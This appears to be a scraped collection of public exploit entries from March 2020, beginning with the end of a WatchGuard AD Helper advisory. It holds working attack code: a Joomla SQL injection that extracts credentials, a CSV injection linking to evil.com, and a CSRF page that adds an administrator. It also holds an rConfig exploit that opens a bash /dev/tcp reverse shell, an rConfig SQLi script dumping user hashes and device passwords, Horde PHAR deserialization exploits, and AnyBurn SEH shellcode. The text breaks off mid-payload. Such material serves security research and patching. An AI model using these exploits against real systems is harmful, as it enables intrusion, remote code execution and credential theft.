------------------------------------------------------------------------ It is likely that other versions of the AD Helper Component are vulnerable as well. Workaround ========== Ensure API of the AD Helper Component is not reachable over the network, for example by putting it behind a Firewall. Fix === Update to Version 5.8.5.10317 or later. 
Security Risk ============= No authentication is needed to access AD Helper's web interface and the installation instructions at [1] describe that configured domain user accounts must possess at least the following privileges: * Connect to the host * Mount the share ADMIN$ * Create a file on the host * Execute commands on the host * Install software on the host Access to the "ADMIN$" share implies a user with administrative privileges. Therefore, this vulnerability poses a high risk. Timeline ======== 2020-02-12 Vulnerability identified 2020-02-19 Customer approved disclosure to vendor 2020-02-24 Tried to contact the German branch of WatchGuard 2020-02-27 Contacted the Dutch branch of WatchGuard 2020-02-28 Contact to ADHelper QA Team Lead established 2020-03-02 Advisory draft sent for verification 2020-03-10 Vendor released fixed version and blog post 2020-03-11 CVE ID requested 2020-03-11 Advisory released References ========== [1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
  6. # Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection # Date: 2020-03-10 # Author: Milad Karimi # Software Link: # Version: # Category : webapps # Tested on: windows 10 , firefox # CVE : CWE-89 # Dork: inurl:index.php?option=com_newsfeeds index.php?option=com_newsfeeds&view=categories&feedid=[sqli] Example: http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
  7. # Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection # Google Dork: N/A # Date: 2020-03-05 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.codepeople.net/ # Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip # Version: 1.3.34 # Tested on: Windows 7 x86 SP1 # CVE : CVE-2020-9371, CVE-2020-9372 ----Stored Cross-Site-Scripting------------------- 1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php 2) Calendar Name=<script>alert(0)</script> and Update 3) Click on any of the other tabs ----CSV injection--------------------------------- 1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out) 2) Then we go to the page and introduce data, and the payload: New booking: Name: IMPORTANT DATA Description: http://evil.com/evil.php New booking: Name: test Description: =HYPERLINK(K2;H2) This is the way it would work if I had a business registered and the payment was completed; it can also be done by adding the new bookings with the same data from the admin panel 3) Then we go to Bookings List and export the CSV file 4) After that we open the file, and import data from an external file, using comma as separator 5) A hyperlink to the malicious PHP file is inserted; when the user clicks on it, the user is redirected to a fake login page (for example) Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
  8. # Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-03-11 # Vendor Homepage: https://www.asus.com/ # Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755 # Tested Version: 1.00.22 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """ ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe Auto C:\>sc qc asHmComSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: asHmComSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ASUS HM Com Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
  # Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-03-11
# Exploit Author: Ismail Akıcı
# Vendor Homepage: http://hrsale.com/
# Software Link : http://demo.hrsale.com/
# Software : HRSALE v1.1.8
# Product Version: v1.1.8
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# Description :
# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
# With this vulnerability, authorized users can be added to the system.

HTML CSRF PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <!--
    Reviewer notes (defender's view):
    * The form targets the vendor's public demo host; an auto-submitting
      version of this page would need a logged-in admin to load it.
    * "csrf_hrsale" is sent with a fixed value captured when the PoC was
      generated. Whether the application binds that token to the victim's
      session is not shown on this page; if it does, this request would be
      rejected (TODO confirm against the application source).
    * Field names are HTML-entity encoded ("&#95;" is "_") as Burp emits
      them; the browser decodes them before submitting.
    * "role" = 1 is presumably the administrator role given the title --
      not verifiable from this page.
    * Mitigation: per-session CSRF tokens validated on add_employee and
      SameSite cookies; detection: add_employee POSTs whose Referer/Origin
      is not the application's own origin.
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="&#95;user" value="1" />
      <input type="hidden" name="csrf&#95;hrsale" value="e8ed76f1f2110f7244b58062e2209961" />
      <input type="hidden" name="first&#95;name" value="Ismail" />
      <input type="hidden" name="last&#95;name" value="Akici" />
      <input type="hidden" name="company&#95;id" value="1" />
      <input type="hidden" name="location&#95;id" value="1" />
      <input type="hidden" name="username" value="ismailtakici" />
      <input type="hidden" name="email" value="ismail&#46;akici&#64;gmail&#46;com" />
      <input type="hidden" name="date&#95;of&#95;birth" value="2020&#45;03&#45;11" />
      <input type="hidden" name="contact&#95;no" value="5554443322" />
      <input type="hidden" name="employee&#95;id" value="1" />
      <input type="hidden" name="date&#95;of&#95;joining" value="2020&#45;03&#45;11" />
      <input type="hidden" name="department&#95;id" value="1" />
      <input type="hidden" name="subdepartment&#95;id" value="YES" />
      <input type="hidden" name="designation&#95;id" value="9" />
      <input type="hidden" name="gender" value="Male" />
      <input type="hidden" name="office&#95;shift&#95;id" value="1" />
      <input type="hidden" name="password" value="Test1234&#33;" />
      <input type="hidden" name="confirm&#95;password" value="Test1234&#33;" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="leave&#95;categories&#91;&#93;" value="0" />
      <input type="hidden" name="leave&#95;categories&#91;&#93;" value="1" />
      <input type="hidden" name="address" value="Test&#32;Address" />
      <input type="hidden" name="is&#95;ajax" value="1" />
      <input type="hidden" name="add&#95;type" value="employee" />
      <input type="hidden" name="form" value="add&#95;employee" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  # Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
# Date: 2020-03-08
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.rconfig.com/
# Version: rConfig <= 3.94
# Tested on: centOS
# CVE: CVE-2020-10221
# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
#
# Python 2 script (print statements). Flow: authenticate with the supplied
# credentials, then POST a 'fileName' value to ajaxAddTemplate.php.
#
# Review notes (reading the code as written, useful when reproducing or detecting):
# - the login response is never inspected; a failed login still proceeds to the
#   second request, so the final status check cannot tell "patched" from
#   "wrong credentials" (both print the same message).
# - a 200 from ajaxAddTemplate.php only means the endpoint answered; it is not
#   evidence that anything was executed.
# - verify=False is passed on both requests, so TLS certificate validation is off.
# - Detection: an authenticated POST to /lib/ajaxHandlers/ajaxAddTemplate.php whose
#   fileName field carries shell metacharacters is the observable artefact.

import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Only silences the warning; the verify=False arguments below are what disable validation.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) < 6:
    print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
    exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
# Command string placed in the template 'fileName' field; host/port come from argv[4]/argv[5].
payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])

login = {
    'user':user,
    'pass':password,
    'sublogin':'1'
}

req = requests.Session()  # keeps the session cookie set by the login response
print "Sendin login request ..."
# Response is not checked; note this rebinds 'login' from the form dict to the Response.
login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)

payload = {
    'fileName':payload,  # rebinds 'payload' from the command string to the POST body
}

print "[+] Sendin exploit ..."
exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
    'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate',
    'Content-Type':'application/x-www-form-urlencoded'},verify=False)

# Status-code-only check: see review notes above.
if exploit.status_code == 200:
    print "[+] Everything seems ok, check your listener."
else:
    print "[-] Exploit failed, system is patched or credentials are wrong."
  # Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection
# Exploit Author: vikingfr
# Date: 2020-03-03
# CVE-2020-10220
# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Version: tested v3.9.4
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# $ python3 rconfig_sqli.py https://1.1.1.1
# rconfig 3.9 - SQL Injection PoC
# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php
# [+] Extracting the current DB name :
# rconfig2
# [+] Extracting 10 first users :
# admin:1:63a9f0ea7bb98050796b649e85481845
# Maybe no more information ?
# Maybe no more information ?
# [snip]
# [+] Extracting 10 first devices :
# 127-0-0-1:127.0.0.1::ocdvulnpass:
# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret
# Maybe no more information ?
# Maybe no more information ?
# [snip]
# Done
#
# Review notes (what the code below actually does):
# - every request is an unauthenticated GET to /commands.inc.php with the
#   'searchColumn' parameter; the UNION payloads are appended to the query string.
# - the hex constants in the payloads decode to the markers '"><BR>[PWN]' and
#   '[PWN]<BR>'; extractDBinfos() locates the injected value by splitting on '[PWN]'.
# - Detection: GETs to commands.inc.php whose query string contains UNION/SELECT or
#   the literal 0x5B50574E5D marker are the observable artefact.

#!/usr/bin/python3
import requests
import sys
import urllib.parse  # imported but not used below
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Only silences the warning; certificate validation is controlled per request by verify=.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print ("rconfig 3.9 - SQL Injection PoC")

if len(sys.argv) != 2:
    print ("[+] Usage : ./rconfig_exploit.py https://target")
    exit()

vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
given_target = sys.argv[1]
target = given_target
target += vuln_page
target += vuln_parameters  # target now ends with the full vulnerable query string

request = requests.session()
# Reachability probe. NOTE(review): 'target' already ends with vuln_page + vuln_parameters,
# so this URL contains /commands.inc.php twice; the later status != 404 test is all it feeds.
dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)

def extractDBinfos(myTarget=None,myPayload=None):
    """
    Issue one injected GET and return the text found between the [PWN] markers.

    Args:
    - myTarget (str): URL that already carries the vulnerable query string
    - myPayload (str): URL-encoded UNION payload appended verbatim to myTarget
    Returns:
    - str: the marked value from the response body, or the fixed string
      "Maybe no more information ?" when no [PWN] marker is present. A missing
      marker covers both "no such row" and any error page; the two are not
      distinguished here.
    Note: unlike the reachability request above, this GET passes no verify=False,
    so an untrusted certificate raises here instead of being ignored.
    """
    result = ""
    encoded_request = myTarget+myPayload
    exploit_req = request.get(encoded_request)
    # .content is bytes; str() gives its b'...' repr, which still contains the marker text.
    if '[PWN]' in str(exploit_req.content):
        result = str(exploit_req.content).split('[PWN]')[1]
    else:
        result="Maybe no more information ?"
    return result

if dashboard_request.status_code != 404:
    print ("[+] Triggering the payloads on "+given_target+vuln_page)
    # get the db name
    print ("[+] Extracting the current DB name :")
    db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
    db_name = extractDBinfos(target,db_payload)
    print (db_name)
    # DB extract users
    # NOTE(review): db_name is interpolated into the next payloads unchecked; if the
    # first query returned the "Maybe no more information ?" string, that text is
    # what ends up in the FROM clause.
    print ("[+] Extracting 10 first users :")
    for i in range (0, 10):
        user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
        user_h = extractDBinfos(target,user1_payload)
        #print ("[+] Dump device "+str(i))
        print (user_h)
    # DB extract devices information
    print ("[+] Extracting 10 first devices :")
    for i in range (0, 10):
        device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
        device_h = extractDBinfos(target,device_payload)
        #print ("[+] Dump device "+str(i))
        print (device_h)
    print ("Done")
else:
    print ("[-] Please verify the URI")
    exit()
  ## exploit-inc-inclusion.py
#!/usr/bin/env python3
# Driver for the Horde helper below: logs in, uploads a '<filename>.inc' file whose
# body is the supplied PHP code, then has the portal include it.
# Review notes:
# - 'subprocess' is imported but never used in this file.
# - the uploaded name carries '.inc' while the include path does not;
#   presumably the template loader appends the extension -- confirm against Horde.
# - the uploaded file is not removed by the script (see the "delete manually" comment).

from horde import Horde
import subprocess
import sys

TEMP_DIR = '/tmp'

if len(sys.argv) < 5:
    print('Usage: <base_url> <username> <password> <filename> <php_code>')
    sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]

# log into the web application
horde = Horde(base_url, username, password)

# upload (delete manually) and evaluate the .inc file
# The trailing die() stops whatever template code follows the injected payload.
horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
## exploit-inc-inclusion.py EOF

## horde.py
import re
import requests

class Horde():
    """Authenticated requests.Session wrapper around the Horde endpoints used by the PoCs.

    All methods report failure with bare `assert` statements: under `python -O` those
    are stripped, so a failed step would silently continue (in _login, token_match
    being None would then surface as an AttributeError on .group()).
    Detection notes: the observable requests are POSTs to /services/portal/edit.php
    with a params[template] value containing '../' (include_remote_inc_file) or a
    params[uri] value starting with 'phar://' (trigger_phar).
    """

    def __init__(self, base_url, username, password):
        """Store credentials, open a cookie-keeping session and log in immediately."""
        self.base_url = base_url
        self.username = username
        self.password = password
        self.session = requests.session()
        self.token = None  # set by _login() from the "TOKEN" value in the post-login page
        self._login()

    def _login(self):
        """POST the credentials to login.php and capture the CSRF token.

        Success is defined as exactly one redirect (302 to /services/portal/) and a
        `"TOKEN":"..."` string in the final page body.
        Raises:
            AssertionError: when either condition fails ('Cannot log in').
        """
        url = '{}/login.php'.format(self.base_url)
        data = {
            'login_post': 1,
            'horde_user': self.username,
            'horde_pass': self.password
        }
        response = self.session.post(url, data=data)
        token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
        assert (
            len(response.history) == 1 and
            response.history[0].status_code == 302 and
            response.history[0].headers['location'] == '/services/portal/' and
            token_match
        ), 'Cannot log in'
        self.token = token_match.group(1)

    def upload_to_tmp(self, filename, data):
        """Send `data` as a contact-photo upload (turba/add.php) under the given filename.

        Where the server stores it is not visible here; the method name and the
        callers assume TEMP_DIR -- verify against the Turba upload handler.
        Raises:
            AssertionError: on any non-200 response.
        """
        url = '{}/turba/add.php'.format(self.base_url)
        files = {
            'object[photo][img][file]': (None, filename),
            'object[photo][new]': ('x', data)
        }
        response = self.session.post(url, files=files)
        assert response.status_code == 200, 'Cannot upload the file to tmp'

    def include_remote_inc_file(self, path):
        """Point a bookmark portal block's template at `path` and render the portal.

        Steps: add a dummy bookmark, add a trean bookmark block at row 0/col 0, set
        its params[template] to a traversal prefix plus `path`, GET the portal
        (which prints the rendered page), then remove the block again.
        Raises:
            AssertionError: on any non-200 response from the intermediate POSTs.
        """
        # vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
        app = 'trean:trean_Block_Bookmarks'

        # add one dummy bookmark (to be sure)
        url = '{}/trean/add.php'.format(self.base_url)
        data = {
            'actionID': 'add_bookmark',
            'url': 'x'
        }
        response = self.session.post(url, data=data)
        assert response.status_code == 200, 'Cannot add the bookmark'

        # add bookmark block
        url = '{}/services/portal/edit.php'.format(self.base_url)
        data = {
            'token': self.token,
            'row': 0,
            'col': 0,
            'action': 'save-resume',
            'app': app,
        }
        response = self.session.post(url, data=data)
        assert response.status_code == 200, 'Cannot add the bookmark block'

        # edit bookmark block
        # Eleven '../' segments are prepended so `path` is resolved from the filesystem root.
        url = '{}/services/portal/edit.php'.format(self.base_url)
        data = {
            'token': self.token,
            'row': 0,
            'col': 0,
            'action': 'save',
            'app': app,
            'params[template]': '../../../../../../../../../../../' + path
        }
        response = self.session.post(url, data=data)
        assert response.status_code == 200, 'Cannot edit the bookmark block'

        # evaluate the remote file
        url = '{}/services/portal/'.format(self.base_url)
        response = self.session.get(url)
        print(response.text)

        # remove the bookmark block so to not break the page
        url = '{}/services/portal/edit.php'.format(self.base_url)
        data = {
            # XXX token not needed here
            # (the author observed that removeBlock is accepted without the token;
            # if accurate, that action lacks the CSRF check the save actions have)
            'row': 0,
            'col': 0,
            'action': 'removeBlock'
        }
        response = self.session.post(url, data=data)
        assert response.status_code == 200, 'Cannot reset the bookmark block'

    def trigger_phar(self, path):
        """Set a syndicated-feed block's URI to phar://`path` and render the portal once.

        Presumably rendering the feed block makes the server open the URI -- the
        portal response is fetched but not printed here. The block is removed afterwards.
        Raises:
            AssertionError: on any non-200 response from the POSTs.
        """
        # vulnerable block (alternatively the same can be obtained by creating a
        # bookmark with the PHAR path and clicking on it)
        app = 'horde:horde_Block_Feed'

        # add syndicated feed block
        url = '{}/services/portal/edit.php'.format(self.base_url)
        data = {
            'token': self.token,
            'row': 0,
            'col': 0,
            'action': 'save-resume',
            'app': app,
        }
        response = self.session.post(url, data=data)
        assert response.status_code == 200, 'Cannot add the syndicated feed block'

        # edit syndicated feed block
        url = '{}/services/portal/edit.php'.format(self.base_url)
        data = {
            'token': self.token,
            'row': 0,
            'col': 0,
            'action': 'save',
            'app': app,
            'params[uri]': 'phar://{}'.format(path)
        }
        response = self.session.post(url, data=data)
        assert response.status_code == 200, 'Cannot edit the syndicated feed block'

        # load the PHAR archive
        url = '{}/services/portal/'.format(self.base_url)
        response = self.session.get(url)

        # remove the syndicated feed block so to not break the page
        url = '{}/services/portal/edit.php'.format(self.base_url)
        data = {
            # XXX token not needed here
            'row': 0,
            'col': 0,
            'action': 'removeBlock'
        }
        response = self.session.post(url, data=data)
        assert response.status_code == 200, 'Cannot reset the syndicated feed block'
## horde.py EOF
  13. ## exploit-phar-loading.py #!/usr/bin/env python3 from horde import Horde import requests import subprocess import sys TEMP_DIR = '/tmp' WWW_ROOT = '/var/www/html' if len(sys.argv) < 5: print('Usage: <base_url> <username> <password> <filename> <php_code>') sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] filename = sys.argv[4] php_code = sys.argv[5] source = '{}/{}.phar'.format(TEMP_DIR, filename) destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually) temp = 'temp.phar' url = '{}/static/{}.php'.format(base_url, filename) # log into the web application horde = Horde(base_url, username, password) # create a PHAR that performs a rename when loaded and runs the payload when executed subprocess.run([ 'php', 'create-renaming-phar.php', temp, source, destination, php_code ], stderr=subprocess.DEVNULL) # upload the PHAR with open(temp, 'rb') as fs: phar_data = fs.read() horde.upload_to_tmp('{}.phar'.format(filename), phar_data) # load the phar thus triggering the rename horde.trigger_phar(source) # issue a request to trigger the payload response = requests.get(url) print(response.text) ## exploit-phar-loading.py EOF ## create-renaming-phar.php #!/usr/bin/env php <?php // the __destruct method of Horde_Auth_Passwd eventually calls // rename($this->_lockfile, $this->_params['filename']) if $this->_locked class Horde_Auth_Passwd { // visibility must match since protected members are prefixed by "\x00*\x00" protected $_locked; protected $_params; function __construct($source, $destination) { $this->_params = array('filename' => $destination); $this->_locked = true; $this->_lockfile = $source; } }; function createPhar($path, $source, $destination, $stub) { // create the object and specify source and destination files $object = new Horde_Auth_Passwd($source, $destination); // create the PHAR $phar = new Phar($path); $phar->startBuffering(); $phar->addFromString('x', ''); $phar->setStub("<?php $stub 
__HALT_COMPILER();"); $phar->setMetadata($object); $phar->stopBuffering(); } function main() { global $argc, $argv; // check arguments if ($argc != 5) { fwrite(STDERR, "Usage: <path> <source> <destination> <stub>\n"); exit(1); } // create a fresh new phar $path = $argv[1]; $source = $argv[2]; $destination = $argv[3]; $stub = $argv[4]; @unlink($path); createPhar($path, $source, $destination, $stub); } main(); ## create-renaming-phar.php EOF ## horde.py import re import requests class Horde(): def __init__(self, base_url, username, password): self.base_url = base_url self.username = username self.password = password self.session = requests.session() self.token = None self._login() def _login(self): url = '{}/login.php'.format(self.base_url) data = { 'login_post': 1, 'horde_user': self.username, 'horde_pass': self.password } response = self.session.post(url, data=data) token_match = re.search(r'"TOKEN":"([^"]+)"', response.text) assert ( len(response.history) == 1 and response.history[0].status_code == 302 and response.history[0].headers['location'] == '/services/portal/' and token_match ), 'Cannot log in' self.token = token_match.group(1) def upload_to_tmp(self, filename, data): url = '{}/turba/add.php'.format(self.base_url) files = { 'object[photo][img][file]': (None, filename), 'object[photo][new]': ('x', data) } response = self.session.post(url, files=files) assert response.status_code == 200, 'Cannot upload the file to tmp' def include_remote_inc_file(self, path): # vulnerable block (alternatively 'trean:trean_Block_Mostclicked') app = 'trean:trean_Block_Bookmarks' # add one dummy bookmark (to be sure) url = '{}/trean/add.php'.format(self.base_url) data = { 'actionID': 'add_bookmark', 'url': 'x' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the bookmark' # add bookmark block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save-resume', 'app': 
app, } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the bookmark block' # edit bookmark block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save', 'app': app, 'params[template]': '../../../../../../../../../../../' + path } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot edit the bookmark block' # evaluate the remote file url = '{}/services/portal/'.format(self.base_url) response = self.session.get(url) print(response.text) # remove the bookmark block so to not break the page url = '{}/services/portal/edit.php'.format(self.base_url) data = { # XXX token not needed here 'row': 0, 'col': 0, 'action': 'removeBlock' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot reset the bookmark block' def trigger_phar(self, path): # vulnerable block (alternatively the same can be obtained by creating a # bookmark with the PHAR path and clocking on it) app = 'horde:horde_Block_Feed' # add syndicated feed block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save-resume', 'app': app, } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the syndicated feed block' # edit syndicated feed block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save', 'app': app, 'params[uri]': 'phar://{}'.format(path) } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot edit the syndicated feed block' # load the PHAR archive url = '{}/services/portal/'.format(self.base_url) response = self.session.get(url) # remove the syndicated feed block so to not break the page url = '{}/services/portal/edit.php'.format(self.base_url) data = { # XXX token not needed here 'row': 0, 'col': 0, 'action': 
'removeBlock' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot reset the syndicated feed block' ## horde.py EOF
  14. # Exploit Title: AnyBurn 4.8 - Buffer Overflow (SEH) # Date: 2020-03-09 # Vendor Homepage: http://www.anyburn.com/ # Software Link : http://www.anyburn.com/anyburn_setup.exe # Exploit Authors: "Richard Davy/Gary Nield" # Tested Version: 4.8 (32-bit) # Tested on: Windows 10 Enterprise x64 # Vulnerability Type: Buffer Overflow/SEH/Unicode # Steps to Produce the Exploit: # 1.- Run python code # 2.- Open payload.txt and copy content to clipboard # 3.- Open AnyBurn choose 'Copy disk to image file' # 4.- Paste the content of payload.txt into the field: 'Select image file name' # 5.- Click 'Create Now' and you will see a crash and the payload launch. #!/usr/bin/env python #Set overall payload size crash_buffer_size = 10000 #nseh offset for SEH overwrite nseh_offset = 9197 #location in payload where stack alignment returns to for payload payloadret = 4459 #payload filler junk = "\x71" * payloadret #Payload generated via msfvenom, easily changeable as padding is auto calculated #msfvenom -a x86 -p windows/exec cmd=calc.exe -e x86/unicode_upper BufferRegister=EAX -f py buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51" buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44" buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41" buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50" buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31" buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50" buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51" buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42" buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b" buf += b"\x4c\x5a\x48\x44\x42\x4d\x30\x4b\x50\x4b\x50\x43\x30" buf += b"\x44\x49\x49\x55\x50\x31\x49\x30\x43\x34\x54\x4b\x50" buf += b"\x50\x50\x30\x44\x4b\x42\x32\x4c\x4c\x54\x4b\x42\x32" buf += b"\x4c\x54\x34\x4b\x43\x42\x4d\x58\x4c\x4f\x46\x57\x4f" buf += 
b"\x5a\x4d\x56\x30\x31\x4b\x4f\x56\x4c\x4f\x4c\x33\x31" buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x49\x31\x48\x4f\x4c" buf += b"\x4d\x4d\x31\x49\x37\x5a\x42\x4c\x32\x50\x52\x50\x57" buf += b"\x44\x4b\x30\x52\x4c\x50\x34\x4b\x50\x4a\x4f\x4c\x54" buf += b"\x4b\x50\x4c\x4c\x51\x54\x38\x5a\x43\x31\x38\x4b\x51" buf += b"\x48\x51\x32\x31\x44\x4b\x42\x39\x4d\x50\x4b\x51\x59" buf += b"\x43\x54\x4b\x51\x39\x4d\x48\x4b\x33\x4f\x4a\x4f\x59" buf += b"\x44\x4b\x30\x34\x44\x4b\x4d\x31\x5a\x36\x30\x31\x4b" buf += b"\x4f\x56\x4c\x57\x51\x58\x4f\x4c\x4d\x4b\x51\x39\x37" buf += b"\x4f\x48\x39\x50\x34\x35\x4b\x46\x4d\x33\x33\x4d\x4b" buf += b"\x48\x4f\x4b\x33\x4d\x4f\x34\x43\x45\x4b\x34\x42\x38" buf += b"\x44\x4b\x51\x48\x4e\x44\x4b\x51\x59\x43\x31\x56\x54" buf += b"\x4b\x4c\x4c\x30\x4b\x44\x4b\x50\x58\x4d\x4c\x4d\x31" buf += b"\x38\x53\x34\x4b\x4b\x54\x44\x4b\x4d\x31\x5a\x30\x53" buf += b"\x59\x51\x34\x4e\x44\x4d\x54\x51\x4b\x31\x4b\x43\x31" buf += b"\x52\x39\x51\x4a\x30\x51\x4b\x4f\x49\x50\x51\x4f\x51" buf += b"\x4f\x30\x5a\x34\x4b\x4c\x52\x4a\x4b\x34\x4d\x51\x4d" buf += b"\x31\x5a\x4b\x51\x34\x4d\x35\x35\x46\x52\x4b\x50\x4d" buf += b"\x30\x4b\x50\x30\x50\x51\x58\x4e\x51\x44\x4b\x42\x4f" buf += b"\x33\x57\x4b\x4f\x59\x45\x47\x4b\x5a\x50\x38\x35\x36" buf += b"\x42\x32\x36\x52\x48\x37\x36\x45\x45\x47\x4d\x45\x4d" buf += 